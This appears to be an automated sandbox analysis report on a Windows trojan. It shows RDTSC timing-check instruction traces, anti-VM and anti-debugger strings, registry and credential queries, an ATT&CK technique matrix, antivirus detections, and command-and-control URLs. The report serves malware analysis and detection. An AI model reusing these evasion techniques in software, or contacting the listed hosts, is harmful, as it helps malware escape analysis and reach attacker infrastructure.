Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951373 second address: 7951379 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951379 second address: 795137D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795137D second address: 7951395 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F0514DC8E18h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 mov bx, F554h 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951395 second address: 79513A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBFh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79513A8 second address: 795143F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 or dword ptr [edx+38h], FFFFFFFFh 0x0000000c pushad 0x0000000d mov esi, ebx 0x0000000f pushfd 0x00000010 jmp 00007F04A523AA97h 0x00000015 xor ax, 094Eh 0x0000001a jmp 00007F04A523AA99h 0x0000001f popfd 0x00000020 popad 0x00000021 or dword ptr [edx+3Ch], FFFFFFFFh 0x00000025 pushad 0x00000026 mov eax, 2D3163F3h 0x0000002b mov dh, ch 0x0000002d popad 0x0000002e or dword ptr [edx+40h], FFFFFFFFh 0x00000032 pushad 0x00000033 call 00007F04A523AA91h 0x00000038 pushfd 0x00000039 jmp 00007F04A523AA90h 0x0000003e and eax, 48F40028h 0x00000044 jmp 00007F04A523AA8Bh 0x00000049 popfd 0x0000004a pop esi 0x0000004b mov ax, bx 0x0000004e popad 0x0000004f pop esi 0x00000050 pushad 0x00000051 push edx 0x00000052 push eax 0x00000053 push edx 0x00000054 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795143F second address: 795144E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 popad 0x00000006 pop ebx 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a mov dh, al 0x0000000c push edi 0x0000000d pop ecx 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 795144E second address: 7951475 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA94h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523AA8Ah 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7951475 second address: 795147B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990AD5 second address: 7990B0E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a jmp 00007F04A523AA96h 0x0000000f push eax 0x00000010 jmp 00007F04A523AA8Bh 0x00000015 xchg eax, ebp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B0E second address: 7990B12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B12 second address: 7990B16 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B16 second address: 7990B1C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B1C second address: 7990B43 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movzx esi, dx 0x00000006 call 00007F04A523AA95h 0x0000000b pop ecx 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov ebp, esp 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 pushad 0x00000016 popad 0x00000017 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B43 second address: 7990B5B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B5B second address: 7990B6D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B6D second address: 7990B71 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7990B71 second address: 7990B86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F04A523AA8Ah 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79408C9 second address: 79408FB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCC1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F04A523FCC8h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79408FB second address: 7940901 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7940901 second address: 794092E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F04A523FCC0h 0x00000010 pop ebp 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 push edi 0x00000017 pop esi 0x00000018 popad 0x00000019 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0018 second address: 78E001F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E001F second address: 78E006B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F04A523FCBCh 0x00000008 pushfd 0x00000009 jmp 00007F04A523FCC2h 0x0000000e sub esi, 274F7CC8h 0x00000014 jmp 00007F04A523FCBBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d xchg eax, ebp 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 jmp 00007F04A523FCC0h 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E006B second address: 78E006F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E006F second address: 78E0075 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0075 second address: 78E0086 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA8Dh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E05FE second address: 78E0604 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0604 second address: 78E0608 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0608 second address: 78E060C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E060C second address: 78E0656 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F04A523AA94h 0x00000010 jmp 00007F04A523AA95h 0x00000015 popfd 0x00000016 movzx ecx, di 0x00000019 popad 0x0000001a push eax 0x0000001b jmp 00007F04A523AA8Ah 0x00000020 xchg eax, ebp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 mov ebx, ecx 0x00000026 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0656 second address: 78E06BD instructions: 0x00000000 rdtsc 0x00000002 call 00007F04A523FCC8h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov esi, edx 0x0000000c popad 0x0000000d mov ebp, esp 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 pushfd 0x00000013 jmp 00007F04A523FCC6h 0x00000018 sub si, 32E8h 0x0000001d jmp 00007F04A523FCBBh 0x00000022 popfd 0x00000023 call 00007F04A523FCC8h 0x00000028 pop ecx 0x00000029 popad 0x0000002a rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06BD second address: 78E06D8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA90h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06D8 second address: 78E06DC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E06DC second address: 78E06E2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0A7D second address: 78E0A8D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBCh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0A8D second address: 78E0AF6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA8Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c pushad 0x0000000d call 00007F04A523AA8Fh 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA98h 0x00000018 sub eax, 78EFAE38h 0x0000001e jmp 00007F04A523AA8Bh 0x00000023 popfd 0x00000024 pop eax 0x00000025 push edx 0x00000026 movzx eax, bx 0x00000029 pop edx 0x0000002a popad 0x0000002b xchg eax, ebp 0x0000002c jmp 00007F04A523AA8Ch 0x00000031 mov ebp, esp 0x00000033 push eax 0x00000034 push edx 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0AF6 second address: 78E0AFA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0AFA second address: 78E0B17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523AA99h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0B17 second address: 78E0B1D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 78E0B1D second address: 78E0B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79309FF second address: 7930A37 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov edx, 46E04484h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c jmp 00007F04A523FCC6h 0x00000011 mov ebp, esp 0x00000013 pushad 0x00000014 push ecx 0x00000015 mov bx, DB50h 0x00000019 pop edx 0x0000001a movzx esi, bx 0x0000001d popad 0x0000001e pop ebp 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 mov ah, BEh 0x00000024 pushad 0x00000025 popad 0x00000026 popad 0x00000027 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7930A37 second address: 7930A4C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523AA91h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910024 second address: 7910081 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F04A523FCBBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b mov ecx, 288D735Bh 0x00000010 pushad 0x00000011 pushfd 0x00000012 jmp 00007F04A523FCBEh 0x00000017 and cx, 5F28h 0x0000001c jmp 00007F04A523FCBBh 0x00000021 popfd 0x00000022 jmp 00007F04A523FCC8h 0x00000027 popad 0x00000028 popad 0x00000029 mov ebp, esp 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e movsx ebx, ax 0x00000031 movzx eax, di 0x00000034 popad 0x00000035 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 7910081 second address: 79100BC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, 3ECDh 0x00000007 pushfd 0x00000008 jmp 00007F04A523AA8Ah 0x0000000d xor al, FFFFFFE8h 0x00000010 jmp 00007F04A523AA8Bh 0x00000015 popfd 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 and esp, FFFFFFF0h 0x0000001c pushad 0x0000001d push ecx 0x0000001e movsx ebx, si 0x00000021 pop esi 0x00000022 mov di, 4130h 0x00000026 popad 0x00000027 sub esp, 44h 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100BC second address: 79100C0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100C0 second address: 79100C4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100C4 second address: 79100CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100CA second address: 79100F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dh, 78h 0x00000005 mov bx, cx 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F04A523AA96h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100F0 second address: 79100F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100F4 second address: 79100FA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 79100FA second address: 791010B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F04A523FCBDh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exeRDTSC instruction interceptor: First address: 791010B second address: 7910159 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c call 00007F04A523AA99h 0x00000011 pop esi 0x00000012 pushfd 0x00000013 jmp 00007F04A523AA91h 0x00000018 adc ch, FFFFFFD6h 0x0000001b jmp 00007F04A523AA91h 0x00000020 popfd 0x00000021 popad 0x00000022 rdtsc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Special instruction interceptor: First address: 12C1B9F instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Special instruction interceptor: First address: 12C1C5B instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Special instruction interceptor: First address: 12BF51A instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Special instruction interceptor: First address: 14F67FC instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Registry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDesc
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersion
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Registry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersion
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Code function: 4_2_07920C3A rdtsc 4_2_07920C3A
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | API coverage: 3.3 %
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | File Volume queried: C:\ FullSizeInformation
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllj'M
Source: NWJ4JvzFcs.exe | Binary or memory string: Hyper-V RAW
Source: NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | System information queried: ModuleInformation
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Process information queried: ProcessInformation

Anti Debugging

Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Thread information set: HideFromDebugger
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Code function: 4_2_079B0812 Start: 079B08CC End: 079B08AF 4_2_079B0812
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: regmonclass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: gbdyllo
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: ollydbg
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: filemonclass
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Open window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | File opened: NTICE
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | File opened: SICE
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | File opened: SIWVID
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Process queried: DebugPort
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Code function: 4_2_07920C3A rdtsc 4_2_07920C3A
Source: NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000002.1439118243.0000000001455000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: [Program Manager
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Queries volume information: C:\Windows\System32\drivers\etc\hosts VolumeInformation
Source: C:\Users\user\Desktop\NWJ4JvzFcs.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: procmon.exe
Source: NWJ4JvzFcs.exe, 00000004.00000003.1300302903.0000000007BD0000.00000004.00001000.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | Binary or memory string: wireshark.exe

Stealing of Sensitive Information

Source: Signature Results | Signatures: Mutex created, HTTP post and idle behavior
Source: global traffic | TCP traffic: 192.168.2.10:49716 -> 5.101.3.217:80

Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 2 Command and Scripting Interpreter | 1 DLL Side-Loading | 1 Process Injection | 23 Virtualization/Sandbox Evasion | OS Credential Dumping | 751 Security Software Discovery | Remote Services | 11 Archive Collected Data | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
Credentials | Domains | Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | 1 DLL Side-Loading | 1 Process Injection | LSASS Memory | 23 Virtualization/Sandbox Evasion | Remote Desktop Protocol | 1 Data from Local System | 3 Ingress Tool Transfer | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | At | Logon Script (Windows) | Logon Script (Windows) | 2 Obfuscated Files or Information | Security Account Manager | 12 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 4 Non-Application Layer Protocol | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | Login Hook | 12 Software Packing | NTDS | 1 Remote System Discovery | Distributed Component Object Model | Input Capture | 5 Application Layer Protocol | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | Network Logon Script | 1 DLL Side-Loading | LSA Secrets | 214 System Information Discovery | SSH | Keylogging | Fallback Channels | Scheduled Transfer | Data Encrypted for Impact

Source | Detection | Scanner | Label
NWJ4JvzFcs.exe | 35% | Virustotal |
NWJ4JvzFcs.exe | 58% | ReversingLabs | Win32.Trojan.Generic
NWJ4JvzFcs.exe | 100% | Avira | TR/Crypt.TPM.Gen
NWJ4JvzFcs.exe | 100% | Joe Sandbox ML |

No Antivirus matches

Source | Detection | Scanner | Label
http://home.fiveth5ht.top/OyKvQ | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF173518686235a1 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | 0% | Avira URL Cloud | safe
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862lse | 0% | Avira URL Cloud | safe

Name | IP | Active | Malicious | Antivirus Detection | Reputation
home.fiveth5ht.top | 5.101.3.217 | true | false | | high
httpbin.org | 3.218.7.103 | true | false | | high

Name | Malicious | Antivirus Detection | Reputation
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862?argument=0 | true | Avira URL Cloud: safe | unknown
http://home.fiveth5ht.top/OyKvQKriwnyyWjwCxSXF1735186862 | false | | high
https://httpbin.org/ip | false | | high

Name | Source | Malicious | Antivirus Detection | Reputation
https://curl.se/docs/hsts.html | NWJ4JvzFcs.exe, 00000004.00000002.1438552619.0000000001151000.00000040.00000001.01000000.00000004.sdmp | false | | high
http://home.fiveth5ht.top/OyKvQ | NWJ4JvzFcs.exe, NWJ4JvzFcs.exe, 00000004.00000003.1433408114.000000000209A000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000002.1440149452.00000000020A6000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433444924.000000000209D000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433998061.00000000020A5000.00000004.00000020.00020000.00000000.sdmp, NWJ4JvzFcs.exe, 00000004.00000003.1433028545.0000000002095000.00000004.00000020.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
